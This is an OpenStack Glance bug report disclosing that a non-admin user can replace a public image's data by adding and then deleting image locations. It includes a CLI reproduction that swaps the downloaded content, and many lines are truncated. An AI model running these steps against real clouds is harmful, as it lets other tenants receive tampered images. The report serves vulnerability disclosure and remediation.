Normal user can replace active image data if show_multiple_locations has been set to true
Affects | Status | Importance | Assigned to | Milestone | |
---|---|---|---|---|---|
Glance |
Confirmed
|
High
|
Unassigned | ||
OpenStack Security Advisory |
Opinion
|
Undecided
|
Unassigned | ||
OpenStack Security Notes |
Fix Released
|
Undecided
|
Robert Clark |
Bug Description
Some time ago there was a security bug https:/
Bug description:
User (non admin) can change image data by updating location for image when "show_multiple_
mfedosin@wdev:~$ glance image-create --name good --disk-format qcow2 --container-format bare --visibility public
+------
| Property | Value |
+------
| checksum | None |
| container_format | bare |
| created_at | 2015-11-
| disk_format | qcow2 |
| id | 2a745d21-
| locations | [] |
| min_disk | 0 |
| min_ram | 0 |
| name | good |
| owner | f3b42d4b90d840b
| protected | False |
| size | None |
| status | queued |
| tags | [] |
| updated_at | 2015-11-
| virtual_size | None |
| visibility | public |
+------
mfedosin@wdev:~$ glance location-add 2a745d21-
+------
| Property | Value |
+------
| checksum | None |
| container_format | bare |
| created_at | 2015-11-
| disk_format | qcow2 |
| file | /v2/images/
| id | 2a745d21-
| locations | [{"url": "https:/
| | {}}] |
| min_disk | 0 |
| min_ram | 0 |
| name | good |
| owner | f3b42d4b90d840b
| protected | False |
| schema | /v2/schemas/image |
| size | 43 |
| status | active |
| tags | [] |
| updated_at | 2015-11-
| virtual_size | None |
| visibility | public |
+------
mfedosin@wdev:~$ glance image-download 2a745d21-
mfedosin@wdev:~$ cat ooo
I'm really good image.
mfedosin@wdev:~$ glance location-add 2a745d21-
+------
| Property | Value |
+------
| checksum | None |
| container_format | bare |
| created_at | 2015-11-
| disk_format | qcow2 |
| file | /v2/images/
| id | 2a745d21-
| locations | [{"url": "https:/
| | {}}, {"url": "https:/
| | {}}] |
| min_disk | 0 |
| min_ram | 0 |
| name | good |
| owner | f3b42d4b90d840b
| protected | False |
| schema | /v2/schemas/image |
| size | 43 |
| status | active |
| tags | [] |
| updated_at | 2015-11-
| virtual_size | None |
| visibility | public |
+------
mfedosin@wdev:~$ glance location-delete 2a745d21-
mfedosin@wdev:~$ glance image-download 2a745d21-
mfedosin@wdev:~$ cat ooo
All your base are belong to us! Muahahaha!
Changed in ossn: | |
assignee: | nobody → hyakuhei (hyakuhei) |
Changed in ossn: | |
assignee: | Robert Clark (robert-clark) → Travis McPeak (travis-mcpeak) |
Changed in ossn: | |
assignee: | Travis McPeak (travis-mcpeak) → Robert Clark (robert-clark) |
description: | updated |
Changed in ossn: | |
status: | New → Fix Released |
information type: | Private Security → Public |
tags: | added: security |
Since this report concerns a possible security risk, an incomplete security advisory task has been added while the core security reviewers for the affected project or projects confirm the bug and discuss the scope of any vulnerability along with potential solutions.